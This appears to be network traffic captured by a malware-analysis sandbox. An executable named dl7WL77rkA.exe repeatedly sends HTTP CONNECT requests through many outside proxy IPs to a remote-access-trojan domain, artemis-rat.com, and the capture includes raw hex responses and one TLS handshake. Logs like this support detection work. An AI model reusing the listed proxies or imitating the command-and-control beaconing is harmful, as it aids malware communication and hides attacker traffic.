                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            458192.168.2.55132524.249.199.1241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.370881081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            459192.168.2.55121249.228.131.16950003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.371037006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.764954090 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            460192.168.2.551431104.20.198.49803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.371454000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.530895948 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            461192.168.2.55132972.195.34.35273603876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.371751070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            462192.168.2.551434104.238.111.10754843876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.371962070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.842303991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.373660088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.592550993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.702332973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889717102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            463192.168.2.551328184.178.172.18152803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.372113943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            464192.168.2.551402129.213.150.20580803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.372360945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.608468056 CET59INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: nginx


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            465192.168.2.55114061.133.66.6990023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.372437954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.822459936 CET311INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            466192.168.2.551456162.159.242.104803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.373198032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.534208059 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            467192.168.2.551442204.236.176.61803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.373984098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.547986984 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.554416895 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c ce a3 82 4c b0 46 98 70 05 52 63 5b ad 98 48 6a ea 6e 74 df b4 4d 50 3f c0 39 d6 03 97 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: elLFpRc[HjntMP?9*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.728137016 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 14 e7 99 c2 aa 5e 74 de b7 e5 5a 1c 04 69 11 c5 27 8a 50 5e 16 77 80 72 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9^tZi'P^wrDOWNGRD0000*H010Uartemis-rat.com0240311021340Z260311021340Z010Uartemis-rat.com0"0*H0r.X=
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.730441093 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 bb d8 9f 1d f1 65 2a a7 65 71 5a 94 9e 3a 10 bc b6 6d e9 d0 4b 94 41 8b 35 2c fa 23 6d 24 52 15 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 b3 c1 ea 62 81 a4 f7 cd f2 5b 6f 02 e6 0e a3 e6 1b ba a2 e5 4a
                                                                                                                                                                                                                                                            Data Ascii: %! e*eqZ:mKA5,#m$R(b[oJ9tV -
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.903244972 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 0f e8 24 64 7b 83 6c 29 32 07 29 d5 69 7a b9 fd 5b 3b 80 35 b6 2f cc 8f 2d 34 84 a1 d9 bb 25 ff a8 db d7 f7 3f 18 50 37
                                                                                                                                                                                                                                                            Data Ascii: ($d{l)2)iz[;5/-4%?P7


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            468192.168.2.55137738.162.19.12331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.374042988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.784830093 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            469192.168.2.55125878.30.128.1080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.376601934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.711673021 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            470192.168.2.55135972.195.114.16941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.377378941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            471192.168.2.55141912.186.205.121803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.378823042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            472192.168.2.551482172.67.182.150803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.378825903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.534066916 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            473192.168.2.551453162.214.154.177322103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.384094000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.842355967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.386646986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.514904976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.811414957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.014738083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.202305079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.508985996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.205282927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
